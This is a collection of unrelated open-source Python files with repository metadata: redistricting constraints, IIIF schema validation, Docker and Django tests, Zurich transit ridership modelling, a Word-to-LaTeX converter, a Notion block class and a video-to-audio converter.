] | null | null | null | gerrychain/constraints/validity.py | rwbogl/GerryChain | e7254ea62df5dc2c6eb6c60d0437d7152bb9649a | [
"BSD-3-Clause"
] | null | null | null | gerrychain/constraints/validity.py | rwbogl/GerryChain | e7254ea62df5dc2c6eb6c60d0437d7152bb9649a | [
"BSD-3-Clause"
] | null | null | null | from ..updaters import CountySplit
from .bounds import Bounds
class Validator:
"""A single callable for checking that a partition passes a collection of
constraints. Intended to be passed as the ``is_valid`` parameter when
instantiating :class:`~gerrychain.MarkovChain`.
This class is meant to be called as a function after instantiation; its
return is ``True`` if all validators pass, and ``False`` if any one fails.
Example usage::
is_valid = Validator([constraint1, constraint2, constraint3])
chain = MarkovChain(proposal, is_valid, accept, initial_state, total_steps)
"""
def __init__(self, constraints):
"""
:param constraints: List of validator functions that will check partitions.
"""
self.constraints = constraints
def __call__(self, partition):
"""Determine if the given partition is valid.
:param partition: :class:`Partition` class to check.
"""
# check each constraint function and fail when a constraint test fails
for constraint in self.constraints:
is_valid = constraint(partition)
if is_valid is False:
return False
elif is_valid is True:
pass
else:
raise TypeError(
"Constraint {} returned a non-boolean.".format(repr(constraint))
)
# all constraints are satisfied
return True
def within_percent_of_ideal_population(
initial_partition, percent=0.01, pop_key="population"
):
"""Require that all districts are within a certain percent of "ideal" (i.e.,
uniform) population.
Ideal population is defined as "total population / number of districts."
:param initial_partition: Starting partition from which to compute district information.
:param percent: (optional) Allowed percentage deviation. Default is 1%.
:param pop_key: (optional) The name of the population
:class:`Tally <gerrychain.updaters.Tally>`. Default is ``"population"``.
:return: A :class:`.Bounds` constraint on the population attribute identified
by ``pop_key``.
"""
def population(partition):
return partition[pop_key].values()
number_of_districts = len(initial_partition[pop_key].keys())
total_population = sum(initial_partition[pop_key].values())
ideal_population = total_population / number_of_districts
bounds = ((1 - percent) * ideal_population, (1 + percent) * ideal_population)
return Bounds(population, bounds=bounds)
def deviation_from_ideal(partition, attribute="population"):
"""Computes the deviation of the given ``attribute`` from exact equality
among parts of the partition. Usually ``attribute`` is the population, and
this function is used to compute how far a districting plan is from exact population
equality.
By "deviation" we mean ``(actual_value - ideal)/ideal`` (not the absolute value).
:param partition: A partition.
:param attribute: (optional) The :class:`Tally <gerrychain.updaters.Tally>` to
compute deviation for. Default is ``"population"``.
:return: dictionary from parts to their deviation
"""
number_of_districts = len(partition[attribute].keys())
total = sum(partition[attribute].values())
ideal = total / number_of_districts
return {
part: (value - ideal) / ideal for part, value in partition[attribute].items()
}
def districts_within_tolerance(partition, attribute_name="population", percentage=0.1):
"""Check if all districts are within a certain percentage of the "smallest"
district, as defined by the given attribute.
:param partition: partition class instance
:param attrName: string that is the name of an updater in partition
:param percentage: what percent difference is allowed
:return: whether the districts are within specified tolerance
:rtype: bool
"""
if percentage >= 1:
percentage *= 0.01
values = partition[attribute_name].values()
max_difference = max(values) - min(values)
within_tolerance = max_difference <= percentage * min(values)
return within_tolerance
def refuse_new_splits(partition_county_field):
"""Refuse all proposals that split a county that was previous unsplit.
:param partition_county_field: Name of field for county information generated by
:func:`.county_splits`.
"""
def _refuse_new_splits(partition):
for county_info in partition[partition_county_field].values():
if county_info.split == CountySplit.NEW_SPLIT:
return False
return True
return _refuse_new_splits
def no_vanishing_districts(partition):
"""Require that no districts be completely consumed."""
if not partition.parent:
return True
return all(len(part) > 0 for part in partition.assignment.parts.values())
| 35.818841 | 92 | 0.688448 |
4a1f6680436c6800c973e4e6ef0624168968d7bf | 2,518 | py | Python | schema-test.py | azaroth42/iiif-v3-validator | 7a8e763bf7f2c033e647948c66757de148511160 | [
"Apache-2.0"
] | 2 | 2018-06-21T15:30:57.000Z | 2018-12-20T16:01:50.000Z | schema-test.py | azaroth42/iiif-v3-validator | 7a8e763bf7f2c033e647948c66757de148511160 | [
"Apache-2.0"
] | 1 | 2018-12-07T14:00:17.000Z | 2018-12-07T14:00:17.000Z | schema-test.py | azaroth42/iiif-v3-validator | 7a8e763bf7f2c033e647948c66757de148511160 | [
"Apache-2.0"
] | null | null | null |
import json
import jsonschema
import os
from jsonschema import validate, Draft6Validator
from jsonschema.exceptions import ValidationError
import json
from iiif_prezi_upgrader import Upgrader
fh = file('schema/Manifest.json')
schema = json.load(fh)
fh.close()
v = Draft6Validator(schema)
fh = file('data/spec-example.json')
instance = json.load(fh)
fh.close()
v.validate(instance)
# walk over all our downloaded stuff...
files = os.listdir('data/remote_cache')
flags= {"ext_ok": False, "deref_links": False}
for f in files:
if f.endswith('.json'):
fn = os.path.join('data/remote_cache', f)
print "processing file: %s" % fn
upgrader = Upgrader(flags)
try:
data = upgrader.process_cached(fn)
except Exception as e:
print("Failed to upgrade %s" % fn)
break
try:
v.validate(data)
except ValidationError as e:
print("Failed to validate %s" % fn)
if e.absolute_schema_path[-1] == u'required' and \
e.message.startswith("u'type'"):
continue
print(e.message)
print(e.absolute_schema_path)
print(e.absolute_path)
break
print "validated!"
if 0:
fh = file('tests/_top.json')
data = fh.read()
fh.close()
start = json.loads(data)
startResolver = FileResolver("", start)
classes = {}
for x in clss:
ss = os.listdir('tests/%s' % x)
l = ["%s/%s" % (x, y) for y in ss if y.endswith('.json')]
schema = {}
for fn in l:
sch = file("tests/%s" % fn)
data = sch.read()
sch.close()
try:
sjs = json.loads(data)
except:
print "Invalid json in schem: %s :(" % fn
raise
fresolvr = FileResolver("", sjs)
schema[fn] = Draft4Validator(sjs, resolver=fresolvr)
classes[x] = schema
def resolve(ref):
c = os.path.split(ref)[0]
return classes[c][ref]
def process(instance, validator):
print validator.schema['title']
try:
validator.validate(instance)
except ValidationError:
print v.schema['errorMessage']
for s in validator.schema.get('onFail', []):
v = resolve(s['$ref'])
process(instance, v)
except Exception:
raise
else:
print "okay"
for s in validator.schema.get('onSuccess', []):
v = resolve(s['$ref'])
process(instance, v)
for s in validator.schema.get('onResult', []):
v = resolve(s['$ref'])
process(instance, v)
ils = os.listdir('data/')
for ifn in ils:
print "Annotation File: %s" % ifn
ifh = file("data/examples/%s" % ifn)
data = ifh.read()
ifh.close()
ijs = json.loads(data)
v = resolve(start['onResult'][0]['$ref'])
process(ijs, v)
| 20.639344 | 59 | 0.650913 |
4a1f679455c0bb1778d5821d9e0f93bd58a15af6 | 1,803 | py | Python | tests/tests/test_docker_inspect.py | housewares/agent | ba54bf145038e7fec723a44299e85869b8600ce1 | [
"Apache-2.0"
] | null | null | null | tests/tests/test_docker_inspect.py | housewares/agent | ba54bf145038e7fec723a44299e85869b8600ce1 | [
"Apache-2.0"
] | null | null | null | tests/tests/test_docker_inspect.py | housewares/agent | ba54bf145038e7fec723a44299e85869b8600ce1 | [
"Apache-2.0"
] | 2 | 2021-01-10T13:27:22.000Z | 2021-01-11T14:19:50.000Z | from common import delete_container, docker_client, event_test
def test_inspect_by_name(agent):
delete_container('/inspect_test')
client = docker_client()
c = client.create_container('ibuildthecloud/helloworld',
name='inspect_test')
inspect = docker_client().inspect_container(c['Id'])
def post(req, resp):
response_inspect = resp['data']['instanceInspect']
# diff_dict(inspect, response_inspect)
assert response_inspect['Id'] == inspect['Id']
del resp['links']
del resp['actions']
event_test(agent, 'docker/instance_inspect',
post_func=post, diff=False)
def test_inspect_by_id(agent):
delete_container('/inspect_test')
client = docker_client()
c = client.create_container('ibuildthecloud/helloworld',
name='inspect_test')
inspect = docker_client().inspect_container(c['Id'])
def pre(req):
instance_inspect = req['data']['instanceInspect']
instance_inspect['id'] = c['Id']
del instance_inspect['name']
def post(req, resp, valid_resp):
response_inspect = resp['data']['instanceInspect']
# can't compare the inspect from go api and py api
# TODO find a new way to assert
assert response_inspect['Id'] == inspect['Id']
# diff_dict(inspect, response_inspect)
event_test(agent, 'docker/instance_inspect', pre_func=pre,
post_func=post, diff=False)
def test_inspect_not_found(agent):
delete_container('/inspect_test')
def post(req, resp):
assert "Id" not in resp['data']['instanceInspect']
assert "Name" not in resp['data']['instanceInspect']
event_test(agent, 'docker/instance_inspect', post_func=post, diff=False)
| 32.196429 | 76 | 0.647255 |
4a1f686c01e29b744fed561a9edeccdae868a21a | 9,340 | py | Python | healthyways/vbz_training.py | frederiksemmel/VersusVirus-HealthyWays | 056b26430e3aca395f1e536b4dd74ddc5edc6567 | [
"MIT"
] | 1 | 2020-06-03T07:31:37.000Z | 2020-06-03T07:31:37.000Z | healthyways/vbz_training.py | frederiksemmel/VersusVirus-HealthyWays | 056b26430e3aca395f1e536b4dd74ddc5edc6567 | [
"MIT"
] | null | null | null | healthyways/vbz_training.py | frederiksemmel/VersusVirus-HealthyWays | 056b26430e3aca395f1e536b4dd74ddc5edc6567 | [
"MIT"
] | null | null | null | from datetime import datetime
import numpy as np
import pandas as pd
from sklearn.kernel_ridge import KernelRidge
from sklearn.linear_model import Ridge, LinearRegression
from sklearn.preprocessing import OneHotEncoder, PolynomialFeatures, normalize
from sklearn.model_selection import train_test_split
from tensorflow.keras.models import Sequential
from tensorflow.keras.optimizers import SGD
from tensorflow.keras.layers import Dense
from tensorflow.keras import regularizers
import seaborn as sns
import matplotlib.pyplot as plt
import warnings
warnings.filterwarnings("ignore")
sns.set(style="ticks", color_codes=True)
def get_data_github():
filenames_suffix = [
"aa",
"ab",
"ac",
"ad",
"ae",
"af",
"ag",
"ah",
"ai",
"aj",
"ak",
"al",
"am",
]
reisende_raws = []
for suffix in filenames_suffix:
url = f"https://raw.githubusercontent.com/marinom27/VersusCorona/master/data/vbz_fahrgastzahlen/REISENDE_PART{suffix}.csv"
reisende_raws.append(pd.read_csv(url, sep=";", header=None, low_memory=False))
url = f"https://raw.githubusercontent.com/marinom27/VersusCorona/master/data/vbz_fahrgastzahlen/LINIE.csv"
linie = pd.read_csv(url, sep=";").set_index("Linien_Id")
url = f"https://raw.githubusercontent.com/marinom27/VersusCorona/master/data/vbz_fahrgastzahlen/TAGTYP.csv"
tagtyp = pd.read_csv(url, sep=";").set_index("Tagtyp_Id")
url = f"https://raw.githubusercontent.com/marinom27/VersusCorona/master/data/vbz_fahrgastzahlen/HALTESTELLEN.csv"
haltestellen = pd.read_csv(url, sep=";").set_index("Haltestellen_Id")
reisende_raw = pd.concat(reisende_raws)
new_columns = reisende_raw.iloc[0]
reisende_raw = reisende_raw.iloc[1:]
reisende_raw.columns = new_columns
return reisende_raw, linie, tagtyp, haltestellen
def get_data_local():
filenames_suffix = [
"aa",
"ab",
"ac",
"ad",
"ae",
"af",
"ag",
"ah",
"ai",
"aj",
"ak",
"al",
"am",
]
reisende_raws = []
for suffix in filenames_suffix:
url = f"../data/vbz_fahrgastzahlen/REISENDE_PART{suffix}.csv"
reisende_raws.append(pd.read_csv(url, sep=";", header=None, low_memory=False))
url = f"../data/vbz_fahrgastzahlen/LINIE.csv"
linie = pd.read_csv(url, sep=";").set_index("Linien_Id")
url = f"../data/vbz_fahrgastzahlen/TAGTYP.csv"
tagtyp = pd.read_csv(url, sep=";").set_index("Tagtyp_Id")
url = f"../data/vbz_fahrgastzahlen/HALTESTELLEN.csv"
haltestellen = pd.read_csv(url, sep=";").set_index("Haltestellen_Id")
reisende_raw = pd.concat(reisende_raws)
new_columns = reisende_raw.iloc[0]
reisende_raw = reisende_raw.iloc[1:]
reisende_raw.columns = new_columns
return reisende_raw, linie, tagtyp, haltestellen
def clean_reisende(reisende, linie, tagtyp, haltestellen):
reisende = reisende.rename(
columns={
"Tagtyp_Id": "Tagtyp_Id",
"Linienname": "Linie",
"Richtung": "Richtung",
"Sequenz": "Anzahl_Haltestellen",
"Haltestellen_Id": "Haltestelle_Id",
"Nach_Hst_Id": "Nachste_Haltestelle_Id",
"FZ_AB": "Uhrzeit",
"Anzahl_Messungen": "Anzahl_Messungen",
"Einsteiger": "Einsteiger",
"Aussteiger": "Aussteiger",
"Besetzung": "Besetzung",
"Distanz": "Distanz",
"Tage_DTV": "Tage_DTV",
"Tage_DWV": "Tage_DWV",
"Tage_SA": "Tage_SA",
"Tage_SO": "Tage_SO",
}
)
reisende = reisende[
[
"Tagtyp_Id",
"Linie",
"Richtung",
"Anzahl_Haltestellen",
"Haltestelle_Id",
"Nachste_Haltestelle_Id",
"Uhrzeit",
"Anzahl_Messungen",
"Einsteiger",
"Aussteiger",
"Besetzung",
"Distanz",
"Tage_DTV",
"Tage_DWV",
"Tage_SA",
"Tage_SO",
]
]
id_to_name = haltestellen["Haltestellenlangname"]
id_to_nummer = haltestellen["Haltestellennummer"]
id_to_tagbemerkung = tagtyp["Bemerkung"]
id_to_tage = {
"3": 62, # Sonntag
"4": 52, # Samstag
"5": 48, # Freitag
"6": 251, # Montag-Freitag
"7": 203, # Montag-Donnerstag
}
reisende["Tagtyp_Id"] = reisende["Tagtyp_Id"].astype("int32").astype("category")
reisende["Tagtyp_Bemerkung"] = (
reisende["Tagtyp_Id"].map(id_to_tagbemerkung).astype("category")
)
reisende["Tagtyp_Tage"] = reisende["Tagtyp_Id"].map(id_to_tage).astype("float32")
reisende["Linie"] = reisende["Linie"].astype("str").astype("category")
reisende["Richtung"] = reisende["Richtung"].astype("category")
reisende["Anzahl_Haltestellen"] = reisende["Anzahl_Haltestellen"].astype("int32")
reisende["Haltestelle_Id"].astype("int32")
reisende["Haltestelle"] = (
reisende["Haltestelle_Id"].map(id_to_name).astype("category")
)
reisende["Haltestelle_Nummer"] = (
reisende["Haltestelle_Id"].map(id_to_nummer).astype("category")
)
reisende["Nachste_Haltestelle"] = (
reisende["Nachste_Haltestelle_Id"].map(id_to_name).astype("category")
)
reisende["Nachste_Haltestelle_Nummer"] = (
reisende["Nachste_Haltestelle_Id"].map(id_to_nummer).astype("category")
)
reisende["Uhrzeit"] = pd.to_datetime(
reisende["Uhrzeit"], format="%H:%M:%S", errors="coerce"
)
reisende["Anzahl_Messungen"] = reisende["Anzahl_Messungen"].astype("int32")
reisende["Einsteiger"] = reisende["Einsteiger"].astype("float32")
reisende["Aussteiger"] = reisende["Aussteiger"].astype("float32")
reisende["Besetzung"] = reisende["Besetzung"].astype("float32")
reisende["Distanz"] = reisende["Distanz"].astype("float32")
reisende["Tage_DTV"] = reisende["Tage_DTV"].astype("float32").replace(0, np.NaN)
reisende["Tage_DWV"] = reisende["Tage_DWV"].astype("float32").replace(0, np.NaN)
reisende["Tage_SA"] = reisende["Tage_SA"].astype("float32").replace(0, np.NaN)
reisende["Tage_SO"] = reisende["Tage_SO"].astype("float32").replace(0, np.NaN)
reisende["Durchschnitt_Tag"] = reisende["Besetzung"] * reisende["Tage_DTV"] / 365
reisende["Durchschnitt_Wochentag"] = (
reisende["Besetzung"] * reisende["Tage_DWV"] / 251
)
reisende["Durchschnitt_Samstag"] = reisende["Besetzung"] * reisende["Tage_SA"] / 52
reisende["Durchschnitt_Sonntag"] = reisende["Besetzung"] * reisende["Tage_SO"] / 62
reisende["Tag"] = "Wochentag"
reisende["Tag"] = reisende["Tag"].where(
reisende["Durchschnitt_Samstag"].isna(), other="Samstag"
)
reisende["Tag"] = reisende["Tag"].where(
reisende["Durchschnitt_Sonntag"].isna(), other="Sonntag"
)
reisende["Tag"] = reisende["Tag"].astype("category")
reisende["Durchschnitt"] = reisende["Durchschnitt_Wochentag"]
reisende["Durchschnitt"] = reisende["Durchschnitt"].where(
reisende["Durchschnitt_Samstag"].isna(), other=reisende["Durchschnitt_Samstag"]
)
reisende["Durchschnitt"] = reisende["Durchschnitt"].where(
reisende["Durchschnitt_Sonntag"].isna(), other=reisende["Durchschnitt_Sonntag"]
)
return reisende
def clean_na(reisende_na):
reisende = reisende_na.dropna(
how="any",
subset=[
"Tagtyp_Id",
"Linie",
"Richtung",
"Haltestelle",
"Uhrzeit",
"Tag",
"Durchschnitt",
],
)
return reisende
def preprocess_df(X_df, categories):
feature_names = ["Linie", "Richtung", "Haltestelle", "Uhrzeit_Bin", "Tag"]
X = X_df[feature_names]
X["Ort"] = (
X["Linie"].astype(str)
+ " "
+ X["Richtung"].astype(str)
+ " "
+ X["Haltestelle"].astype(str)
).astype("category")
categories = [X[name].cat.categories for name in X.columns]
y = reisende_sample["Besetzung"].to_numpy().reshape(-1, 1)
enc = OneHotEncoder(categories, handle_unknown="ignore").fit(X)
X = enc.transform(X).toarray()
return X, y
def fit_regression_model(reisende):
X, y = preprocess(reisende)
model = Ridge(alpha=10, fit_intercept=False)
model.fit(X, y)
return model
def fit_neural_network(reisende):
X, y = preprocess_df(reisende)
n, d = X.shape
X_train, X_test, y_train, y_test = train_test_split(
X, y, test_size=0.20, random_state=42
)
model = Sequential()
model.add(
Dense(
units=400,
activation="relu",
input_dim=d,
kernel_regularizer=regularizers.l2(0.01),
)
)
model.add(Dense(units=1))
sgd = SGD(learning_rate=0.005, momentum=0.0, nesterov=False)
model.compile(
loss="mean_squared_error", optimizer=sgd, metrics=["mean_squared_error"]
)
model.fit(X_train, y_train, epochs=10, batch_size=64)
loss_and_metrics = model.evaluate(X_test, y_test, batch_size=128)
print(model.summary())
print(loss_and_metrics)
model.reset_metrics()
model.save("vbz_model.h5")
return model
| 32.430556 | 130 | 0.625161 |
4a1f6a07eeabdd51bdc9e06142e7fcf9db17a135 | 3,861 | py | Python | wcit2bib/get_raw_tex.py | lucascr91/word2tex | a1dcba237aec276e5e024740f6c458715822b234 | [
"MIT"
] | null | null | null | wcit2bib/get_raw_tex.py | lucascr91/word2tex | a1dcba237aec276e5e024740f6c458715822b234 | [
"MIT"
] | null | null | null | wcit2bib/get_raw_tex.py | lucascr91/word2tex | a1dcba237aec276e5e024740f6c458715822b234 | [
"MIT"
] | null | null | null | print("Creating a TEX file from the word document")
import docx
import sys
import os
import pandas as pd
import numpy as np
from tqdm import tqdm
from docx.enum.text import WD_ALIGN_PARAGRAPH
try:
doc = docx.Document(sys.argv[1])
except:
raise ValueError("Please, add word document")
try:
new_path=sys.argv[2]
except:
raise ValueError("Please, add the target path")
def to_bold(text):
return '\\textbf{{{}}} '.format(text)
def to_italic(text):
return '\\textit{{{}}} '.format(text)
def to_underline(text):
return '\\underline{{{}}} '.format(text)
def run_df(para):
"""
Create a dataframe where each row is a run and the columns are boolean values informing if the run is bold, underline, italic etc.
"""
df= pd.DataFrame({"run":[k.text for k in para.runs],"bold":[k.bold for k in para.runs],"italic":[k.italic for k in para.runs], "underline":[k.underline for k in para.runs]})
df.replace({None:False}, inplace=True)
df['latex']=[to_bold(df['run'][k]) if (df['bold'][k]==True) & (df['italic'][k]==False) & (df['underline'][k]==False) else df['run'][k] for k in df.index]
df['latex']=[to_italic(df['run'][k]) if (df['bold'][k]==False) & (df['italic'][k]==True) & (df['underline'][k]==False) else df['latex'][k] for k in df.index]
df['latex']=[to_underline(df['run'][k]) if (df['bold'][k]==False) & (df['italic'][k]==False) & (df['underline'][k]==True) else df['latex'][k] for k in df.index]
df['latex']=[to_italic(to_bold(df['run'][k])) if (df['bold'][k]==True) & (df['italic'][k]==True) & (df['underline'][k]==False) else df['latex'][k] for k in df.index]
df['latex']=[to_underline(to_bold(df['run'][k])) if (df['bold'][k]==True) & (df['italic'][k]==False) & (df['underline'][k]==True) else df['latex'][k] for k in df.index]
df['latex']=[to_underline(to_italic(df['run'][k])) if (df['bold'][k]==False) & (df['italic'][k]==True) & (df['underline'][k]==True) else df['latex'][k] for k in df.index]
df['latex']=[to_bold(to_underline(to_italic(df['run'][k]))) if (df['bold'][k]==True) & (df['italic'][k]==True) & (df['underline'][k]==True) else df['latex'][k] for k in df.index]
return df
os.chdir(new_path)
#get paragraphs
all_paragraphs = doc.paragraphs
#remove empty paragraphs
paragraphs = [k for k in all_paragraphs if k.text!='']
alignment_values=[paragraph.paragraph_format.alignment for paragraph in paragraphs]
print("These are the paragraphs alignments")
for value in alignment_values:
print(value)
# print("Center is regard as block citation")
#join paragraphs and add \par keyword
full_text = ''
for paragraph in tqdm(paragraphs):
#is center align?
if paragraph.paragraph_format.alignment==WD_ALIGN_PARAGRAPH.CENTER:
df=run_df(paragraph)
full_text = full_text + "\n" + "\\begin{{center}}\n{}\n\\end{{center}}".format(''.join(df['latex'].to_list()))+"\n"
# elif is_block[paragraph]:
# full_text = full_text + "\n" + "\\begin{{citacao}}\n{}\n\\end{{citacao}}".format(paragraph.text)+"\n"
else:
df=run_df(paragraph)
full_text = full_text + "\n" + "\par " + ''.join(df['latex'].to_list()) + "\n"
#create escapes for latex
full_text = full_text.replace("%","\%").replace("_","\_")
#add text to template
basic_template = "{}".format(full_text)
todoc_template = """
\\documentclass{{report}}
\\usepackage[utf8]{{inputenc}}
\\usepackage[portuguese]{{babel}}
\\usepackage[autostyle,portuguese=brazilian]{{csquotes}}
\\usepackage[
backend=biber,
style=alphabetic,
sorting=ynt
]{{biblatex}}
\\addbibresource{{references.bib}}
\\begin{{document}}
\\input{{title_page}}
{}
\\printbibliography
\\end{{document}}
""".format(full_text)
os.system("mkdir text")
f = open("text/text.tex", "w")
f.write(basic_template)
f.close()
f = open("docx/main.tex", "w")
f.write(todoc_template)
f.close()
print("Done") | 36.771429 | 182 | 0.650091 |
4a1f6a25595d5a8b4ee49ea8fb0404097e9a3fa4 | 4,152 | py | Python | testproject/fiber_test/tests/test_views/test_fibertemplateview.py | bsimons/django-fiber | 0f4b03217a4aeba6b48908825507fbe8c5732c8d | [
"Apache-2.0"
] | 143 | 2015-01-06T01:15:22.000Z | 2017-07-08T04:10:08.000Z | testproject/fiber_test/tests/test_views/test_fibertemplateview.py | bsimons/django-fiber | 0f4b03217a4aeba6b48908825507fbe8c5732c8d | [
"Apache-2.0"
] | 44 | 2015-01-22T14:21:32.000Z | 2017-05-31T16:59:23.000Z | testproject/fiber_test/tests/test_views/test_fibertemplateview.py | bsimons/django-fiber | 0f4b03217a4aeba6b48908825507fbe8c5732c8d | [
"Apache-2.0"
] | 53 | 2015-01-21T21:48:49.000Z | 2017-06-12T07:33:13.000Z | from django.contrib.auth.models import User
from django.test import TestCase, RequestFactory
from django.test.utils import override_settings
from fiber.models import Page, ContentItem, PageContentItem
from fiber.views import FiberTemplateView
class TestFiberTemplateView(TestCase):
def setUp(self):
self.frontpage = Page.objects.create(title='frontpage', url='/')
self.template_page = Page.objects.create(title='template page', url='/template-page/', template_name='template1.html')
def test_get_fiber_page_url(self):
"""Returns request url"""
view = FiberTemplateView()
view.request = RequestFactory().get(self.frontpage.url)
self.assertEqual(view.get_fiber_page_url(), self.frontpage.url)
def test_get_fiber_page(self):
"""Returns requested page"""
view = FiberTemplateView()
view.request = RequestFactory().get(self.frontpage.url)
self.assertEqual(view.get_fiber_page(), self.frontpage)
def test_get_fiber_page_for_non_fiber_url(self):
"""Returns requested page"""
view = FiberTemplateView()
view.request = RequestFactory().get('/empty/')
self.assertIsNone(view.get_fiber_page())
def test_get_template_names_default(self):
"""Returns default template"""
view = FiberTemplateView()
view.request = RequestFactory().get(self.frontpage.url)
self.assertEqual(view.get_template_names(), 'base.html')
def test_get_template_names_from_page(self):
"""Returns custom template"""
view = FiberTemplateView()
view.request = RequestFactory().get(self.template_page.url)
self.assertEqual(view.get_template_names(), 'template1.html')
def test_renders_default_template(self):
"""Renders default template to response"""
lipsum = ContentItem.objects.create(content_html='lorem ipsum')
PageContentItem.objects.create(page=self.frontpage, content_item=lipsum, block_name='main')
response = self.client.get(self.frontpage.url)
self.assertContains(response, 'lorem ipsum')
self.assertContains(response, '<title>frontpage</title>')
def test_renders_custom_template(self):
"""Renders custom template to tesponse"""
response = self.client.get(self.template_page.url)
self.assertContains(response, 'This is template1.')
def test_trailing_slash_redirect(self):
"""Handles APPEND_SLASH"""
self.assertRedirects(self.client.get(self.template_page.url.rstrip('/')), self.template_page.url, 301)
@override_settings(APPEND_SLASH=False)
def test_no_trailing_slash_redirect(self):
"""Considers APPEND_SLASH config"""
self.assertEqual(self.client.get(self.template_page.url.rstrip('/')).status_code, 404)
def test_redirect_page(self):
"""Redirects to another page"""
Page.objects.create(title='redirect', url='/redirect/', redirect_page=self.frontpage)
self.assertRedirects(self.client.get('/redirect/'), self.frontpage.url, 301)
def test_redirect_to_self(self):
"""Does not redirect to self"""
page = Page.objects.create(title='redirect loop', url='/redirect-loop/')
page.redirect_page = page
page.save()
self.assertEqual(self.client.get('/redirect-loop/').status_code, 200)
def test_404_page(self):
"""Does not mask 404 pages"""
self.assertEqual(self.client.get('/does-not-exists/').status_code, 404)
def test_private_pages(self):
"""Hides private pages"""
Page.objects.create(title='private', url='/private/', is_public=False)
self.assertEqual(self.client.get('/private/').status_code, 404)
def test_private_pages_for_staff(self):
"""Shows private pages"""
staff = User.objects.create_user('staff', '[email protected]', password='staff')
staff.is_staff = True
staff.save()
Page.objects.create(title='private', url='/private/', is_public=False)
self.client.login(username='staff', password='staff')
self.assertEqual(self.client.get('/private/').status_code, 200)
| 43.705263 | 126 | 0.688825 |
4a1f6abd8e981bf18a4247a3576c893419408672 | 297 | py | Python | samples/advanced/sources/route.py | bernardocouto/bottle-postgresql | e1b5a9d09565ebb21f59ae0d41ea2f67319ee53f | [
"MIT"
] | 10 | 2021-03-23T19:49:05.000Z | 2022-01-04T18:15:32.000Z | samples/advanced/sources/route.py | bernardocouto/bottle-postgresql | e1b5a9d09565ebb21f59ae0d41ea2f67319ee53f | [
"MIT"
] | null | null | null | samples/advanced/sources/route.py | bernardocouto/bottle-postgresql | e1b5a9d09565ebb21f59ae0d41ea2f67319ee53f | [
"MIT"
] | null | null | null | from bottle import Bottle
from samples.advanced.sources.log import get_logger
from samples.advanced.sources.resources.entity.resource import entity_resource
logger = get_logger(__name__)
route = Bottle()
resources = [
entity_resource
]
for resource in resources:
route.merge(resource)
| 19.8 | 78 | 0.794613 |
4a1f6c20ff0c65002ae690e35c8d998db183a4f9 | 1,660 | py | Python | notion_extensions/base/props/block/link_to_page.py | yuta0306/notion-extensions | 8a26f8c2abeef03a55c4d433439ce35ae5728a75 | [
"MIT"
] | 1 | 2022-01-12T15:53:43.000Z | 2022-01-12T15:53:43.000Z | notion_extensions/base/props/block/link_to_page.py | yuta0306/notion-extensions | 8a26f8c2abeef03a55c4d433439ce35ae5728a75 | [
"MIT"
] | 1 | 2022-03-24T01:38:42.000Z | 2022-03-24T01:38:42.000Z | notion_extensions/base/props/block/link_to_page.py | yuta0306/notion-extensions | 8a26f8c2abeef03a55c4d433439ce35ae5728a75 | [
"MIT"
] | null | null | null | import sys
from typing import Dict, Union
if sys.version_info >= (3, 8): # "from typing" in Python 3.9 and earlier
from typing import Literal
else:
from typing_extensions import Literal
from .block import Block
from ...utils import parse_id
__all__ = [
"LinkToPage",
]
class LinkToPage(Block):
"""
LinkToPage
LinkToPage property values of block
Attributes
----------
type_ : str
Type of this link to page object. Possible values are: "page", "database"
id_ : str
Identifier for a page or a database page
Methods
-------
clear()
Clear data of title
json()
Return this class as dictionary
"""
TEMPLATE: Dict[str, Union[str, Dict]] = {
"type": "link_to_page",
"link_to_page": {},
}
def __init__(
self,
type_: Literal["page", "database"],
id_: str,
):
"""
Parameters
----------
type_ : 'page' or 'database'
Type of this link to page object. Possible values are: "page", "database"
id_ : str
Identifier for a page or a database page, URL style is ok.
"""
super().__init__()
if type_ not in ("page", "database"):
raise ValueError("type_ must be `page` or `database`")
id_ = parse_id(id_=id_, type_=type_)
type_ = f"{type_}_id"
self["link_to_page"]["type"] = type_
self["link_to_page"][type_] = id_
@property
def type_(self) -> str:
return self["link_to_page"]["type"]
@property
def id_(self) -> str:
return self["link_to_page"][self.type_]
| 23.714286 | 85 | 0.565663 |
4a1f6ca7dd16d24e2ac94203d7e79e70f907f754 | 2,256 | py | Python | src/VideoToAudioConverter.py | NagabhushanSN95/VideoToAudioConverter | 964459047b96a71db2078288c71e45a43eaefa27 | [
"Apache-2.0"
] | null | null | null | src/VideoToAudioConverter.py | NagabhushanSN95/VideoToAudioConverter | 964459047b96a71db2078288c71e45a43eaefa27 | [
"Apache-2.0"
] | null | null | null | src/VideoToAudioConverter.py | NagabhushanSN95/VideoToAudioConverter | 964459047b96a71db2078288c71e45a43eaefa27 | [
"Apache-2.0"
] | null | null | null | # Shree KRISHNAya Namaha
# Converts videos to mp3 files and saved them. Optionally adds meta data to the audio files.
# Author: Nagabhushan S N
# Last Modified: 06/03/22
import eyed3
import os
import time
import datetime
import traceback
from pathlib import Path
from tqdm import tqdm
this_filepath = Path(__file__)
this_filename = this_filepath.stem
def convert_songs(src_dirpath: Path, tgt_dirpath: Path, add_metadata: bool = False):
all_files = sorted(src_dirpath.rglob('**/*'))
all_files = [path for path in all_files if path.is_file()]
all_files = [path for path in all_files if path.suffix not in ['.txt', '.png', '.jpg']]
for src_path in tqdm(all_files):
tgt_path = tgt_dirpath / os.path.relpath(src_path, src_dirpath)
tgt_path = tgt_path.parent / f'{tgt_path.stem}.mp3'
tgt_path.parent.mkdir(parents=True, exist_ok=True)
cmd = f'ffmpeg -i "{src_path.as_posix()}" "{tgt_path.as_posix()}"'
os.system(cmd)
if add_metadata:
title = tgt_path.stem
artist = tgt_path.parent.parent.stem
album = tgt_path.parent.stem
mp3_file = eyed3.load(tgt_path.as_posix())
mp3_file.tag.title = title
if artist.lower() != 'nknown':
mp3_file.tag.artist = artist
if album.lower() != 'unknown':
mp3_file.tag.album = album
# mp3_file.tag.year = year
# mp3_file.tag.comments.set(comments)
mp3_file.tag.save()
return
def main():
src_dirpath = Path('../Data/FilmSongsVideo')
tgt_dirpath = Path('../Data/FilmSongsAudio')
convert_songs(src_dirpath, tgt_dirpath, add_metadata=True)
return
if __name__ == '__main__':
print('Program started at ' + datetime.datetime.now().strftime('%d/%m/%Y %I:%M:%S %p'))
start_time = time.time()
try:
main()
run_result = 'Program completed successfully!'
except Exception as e:
print(e)
traceback.print_exc()
run_result = 'Error: ' + str(e)
end_time = time.time()
print('Program ended at ' + datetime.datetime.now().strftime('%d/%m/%Y %I:%M:%S %p'))
